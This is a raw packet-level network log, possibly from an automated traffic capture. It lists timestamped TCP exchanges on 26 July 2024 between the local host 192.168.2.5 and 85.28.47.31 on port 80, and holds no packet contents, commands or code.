Jul 26, 2024 17:56:15.339365005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339369059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339378119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339387894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339396954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339421034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339570999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339582920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339616060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339646101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339658976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339668989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339682102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339690924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339693069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339703083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.339706898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.339746952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.340845108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340857029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340867996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340873957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340886116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340897083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340909004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340919971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.340949059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.340982914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.341352940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341363907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341375113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341386080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341397047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341397047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.341408014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341419935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341432095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341437101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.341443062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341455936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.341469049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.341490984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.342319012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342329979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342339993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342350960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342360973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342372894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342379093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.342384100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342395067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342405081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342411041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.342422962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.342443943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.342466116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.343631029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343642950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343652964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343660116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343672037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343683958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343696117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343703032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.343707085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343718052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343729973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.343734026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.343754053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.343777895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.344223976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344234943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344245911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344258070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344269037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344276905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.344280958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344294071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344305038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344310045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.344316959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344329119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.344345093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.344362020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.345082998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345096111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345144033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.345307112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345319986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345331907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345345020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345355988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345375061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345381021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345387936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.345391989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345403910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345411062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.345416069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.345433950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.345453978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.346244097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.346261978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.346306086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.346322060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.424546003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424567938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424580097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424650908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.424803019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424815893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424825907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.424884081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.424884081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425149918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425159931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425165892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425177097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425189018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425201893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425210953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425247908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425756931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425769091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425780058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425791025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425801039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425807953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425812960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425825119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.425834894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425853968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.425878048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.426484108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426495075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426506042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426517010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426527977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426537037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.426538944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426549911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426563978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426573992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.426577091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426589966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.426599026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.426631927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.427491903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427505016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427514076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427525997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427536964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427548885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427555084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427558899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.427566051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427573919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.427577019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427591085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.427597046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.427618980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.427648067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428299904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428313971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428327084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428338051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428348064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428349972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428359985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428370953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428380013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428381920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428392887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428404093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428414106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428417921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428430080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.428437948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428461075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.428484917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.429259062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429270029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429280996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429294109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429306984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429315090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.429320097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429331064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429343939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429353952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429359913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429367065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.429372072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429383039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429394007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.429395914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.429440975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430022955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430221081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430233002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430243015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430253983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430265903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430282116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430283070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430291891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430303097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430313110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430316925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430325031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430337906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430346012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430350065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.430368900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.430387974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431200981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431212902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431224108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431235075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431251049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431261063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431262016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431271076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431282043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431282997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431293964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431301117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431303978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431317091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431327105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431329012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.431353092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.431372881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432001114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432025909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432051897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432084084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432146072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432168961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432188034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432192087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432214022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432219028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432241917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432243109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432267904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432275057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432290077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432300091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432323933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432327032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432346106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432348967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432368994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432370901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432390928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.432393074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432411909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.432439089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433079958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433103085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433125973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433137894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433149099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433152914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433172941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433175087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433197975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433201075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433222055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433222055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433244944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.433245897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433267117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.433290005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.522876024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.522927046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.522944927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.522974014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523010015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523022890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523056984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523123026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523164988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523194075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523205996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523216963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523240089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523271084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523878098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523889065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523900032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523910999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523921967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523929119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523932934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523943901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523956060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523962021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.523968935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.523991108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524027109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524182081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524193048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524224043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524250031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524326086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524337053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524347067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524358034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524368048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524372101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524379015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524380922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524389029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524399042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524409056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524415016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524420023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.524435997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.524456024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525468111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525479078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525489092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525500059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525510073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525518894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525522947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525533915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525540113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525546074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525556087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525559902 CEST	49704	80	192.168.2.5	85.28.47.31
